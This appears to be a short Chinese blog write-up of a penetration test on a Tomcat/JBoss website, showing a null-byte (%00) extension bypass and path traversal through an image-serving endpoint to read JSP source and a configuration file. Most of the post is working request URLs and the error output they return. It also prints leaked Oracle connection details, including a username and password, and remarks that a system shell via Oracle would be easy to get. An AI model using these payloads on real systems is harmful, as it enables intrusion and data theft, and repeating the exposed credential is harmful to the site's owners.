tomcat和jboss网站%00欺骗

tomcat+jboss,站点交互功能很少,漏洞扫描器没发现什么问题。

手工一个一个文件慢慢翻,翻了好多发现有的文章提示“没有图片”,也就是说可能有的文章附有图片了。一个个找终于看到一张图片,右键查看一下图片URL,发现有些可疑:

http://webhost/AjaxAction.do?actionType=showimage&id=1101110623085223t.jpg

试一下改变成:

http://webhost/AjaxAction.do?actionType=showimage&id=111actionType=showimage&id=111

出错了:

java.io.IOException: 文件不是图片格式,请检查后继续!只能输出gif、jpg、png三种格式文件!
cn.com.chx.util.ImageUtil.outImageStream(ImageUtil.java:68)
cn.com.chx.eform.AjaxAction.showImage(AjaxAction.java:265)

再试试有没有过滤结束符构造一个合法的:

http://webhost/AjaxAction.do?actionType=showimage&id=111%00.gif

非常有意思,不但得到了web path而且还成功欺骗了程序:

java.io.FileNotFoundException: E:\webhost\server\default\deploy\root.war\WEB-INF\resource\111?3;.gif (系统找不到指定的文件。)
java.io.FileInputStream.open(Native Method)
java.io.FileInputStream.(FileInputStream.java:106)
cn.com.chx.util.ImageUtil.outImageStream(ImageUtil.java:74)

再试试能不能返回上级目录,因为上面暴出了web path,所以退只要两格:

http://webhost/AjaxAction.do?actionType=showimage&id=../../login.jsp%00.gif

哈哈,直接看到了jsp源码~~~
接下来可以去尝试读一下web-inf下面的xml文件:

http://webhost/AjaxAction.do?actionType=showimage&id=../../web-inf/chx-config.xml%00.gif

找到了最重要的oracle密码(直接访问xml访问不了):
- oracle oracle.jdbc.driver.OracleDriver jdbc:oracle:thin:@localhost:1521:orcl xbox xbox123qwe@#$_web 做渗透测试项目就做到这就可以了,接下来要绕过fw利用oracle获得个systemshell也并非难事

你可能感兴趣的:(职场,休闲)